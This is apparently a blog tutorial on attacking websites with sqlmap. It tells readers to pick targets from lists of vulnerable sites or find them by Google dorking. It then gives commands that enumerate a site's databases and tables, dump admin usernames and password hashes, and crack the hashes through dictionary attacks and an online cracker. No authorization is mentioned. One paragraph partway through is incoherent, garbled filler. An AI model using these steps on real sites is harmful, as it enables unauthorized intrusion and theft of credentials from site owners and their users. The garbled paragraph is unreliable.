Hack website and Take Database over using SQLMAP.
What is What is SQLMAP?
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine.
many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
SQLMAP is pre-installed on Kali Linux.
It has many more feature in this article we will see how you can take over database with SQLMAP.So if you want to do extra research on SQLMAP and it's features then visit their official website.
So before using SQLMAP we need a vulnerable website here is the latest list of vulnerable website pick a url from there.Or you can use google dorking techniques to find vulnerable-websites.
Paste url into your browser.Let's say you have pasted the following url:
Now to check whether website is vulnerable to injection or not Just add Single quotation mark ' at the end of url, Now your address should look like this:
If it returns the error as shown in below picture then website is vulnerable to injection.
Once you have your target ready then open your terminal and type the following command.It displays all the commands that you can use with SQLMAP.Go through it .
root@seven:~# sqlmap -h Usage: python sqlmap [options] Options: -h, --help Show basic help message and exit -hh Show advanced help message and exit --version Show program's version number and exit -v VERBOSE Verbosity level: 0-6 (default 1) Target: At least one of these options has to be provided to define the target(s) -u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1") -g GOOGLEDORK Process Google dork results as target URLs Request: These options can be used to specify how to connect to the target URL --data=DATA Data string to be sent through POST --cookie=COOKIE HTTP Cookie header value --random-agent Use randomly selected HTTP User-Agent header value --proxy=PROXY Use a proxy to connect to the target URL --tor Use Tor anonymity network --check-tor Check to see if Tor is used properly Injection: These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts -p TESTPARAMETER Testable parameter(s) --dbms=DBMS Force back-end DBMS to this value -a, --all Retrieve everything
Grab all the databases
First thing we need to do is to look for all the available databases in website.Syntax goes like this:
sqlmap -u [URL] --dbs
-u :   is for URL .
--dbs :   is for enumerating DBMS database.It fetches all the databases inside the website.
root@seven:~# sqlmap -u www.yourtarget.com/index.php?id=31 --dbs
Just press y when it asks it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? Because Sqlmap has detected back end database in this case as you can see it's MySql.So press y and skip further testing.In very next line press y too.
Wait for few minutes until it finishes.On the successful completion it will list all the databases inside website.
The information_schema database is a standard database for every MYSQL database so ignore it.
So we are interested in other(guru) database.Now choose a database that you want to exploit.I am going to exploit guru.
Extract Tables inside database
Once you choose the database that you want to exploit then we need to look at it's tables.
You have to give two parameters:Syntax:
sqlmap -u [URL] -D Database_name --tables
- -D :   option is for database you must give the database name that you want to exploit.
- --tables : Extracts the tables inside the database.
root@seven:~# root@seven:~# sqlmap -u http://target.com/product_detail.php?ID=41 -D guru --tables
Replace the database_name with the database that you want to exploit.
As you can see from the below picture that we have fetched tables.There are plenty of tables but we are interested in AdminUser.
Now next thing you will be interested in is columns of table.Now that we have table that we want to exploit we have to extract columns of the table:
- -D : option is for database you must give database name.
- -T : Table name.
- --columns :It retrieves the columns inside a table.
we can always do this later we have to be precise not only in other area of groung also in bleaching area codes we can asses the situations pretty well as per performance we have to ractify the right guys either do it practically or symmatrucally whatever way we choose things will always re,ain the same if there is a vulnerability that we can expect
root@seven:~# sqlmap -u http://target.com/product_detail.php?ID=41 -D guru -T AdminUser --columns
When it finishes it displays all the columns inside table.As you can see in the above picture. Now we know our columns .Go through columns you may find interesting columns like username , passwords and emails etc.I am going to access USR_Password column first.We will extract username stored inside the column(USR_Username). You need give the following options:
- -D : For accessing database.
- -T : For accessing Table.
- -C : For accessing column.
- --dump : command will extract data inside the column.
root@seven:~# sqlmap -u http://target.com/product_detail.php?ID=41 -D guru -T AdminUser -C USR_Username --dump
We have found two admin accounts here.Now we need the password.
If there are many users then it takes time so to speed up the information retrieval speed We can use --threads option for faster data retrieval.
root@seven:~# sqlmap -u http://target.com/product_detail.php?ID=41 -D guru -T AdminUser -C USR_Username --dump --threads 7
It's time to see the password column .Command stays the same except the column name.So replace the USR_Username(Username) column with the USR_Password(password).
root@seven:~# sqlmap -u http://target.com/product_detail.php?ID=41 -D guru -T AdminUser -C USR_Password --dump
Ofcourse password will not be presented in plain text so we have have crack password .As you can see in the below picture .You will be asked to creack password using dictionary-based attack press y and hit enter.
Now press 1 to use default dictionary if you have your custom dictionary file then specify the path.Once you press 1 it will start cracking the hashes.In most cases hashes will not be cracked with default dictionary file.
It did not find any passwords so we have look for other alternatives .There are lots of online md5 decrypters.
So make note of your hashes.We will use hashkiller website to crack the hash.
Go to the hashkiller to crack the hash.Paste hash on the right side at the bottom fill the captcha and click on the submit button.Cracked hash will be shown along with hash on the right side, as you can see in below picture i have cracked my hash successfully.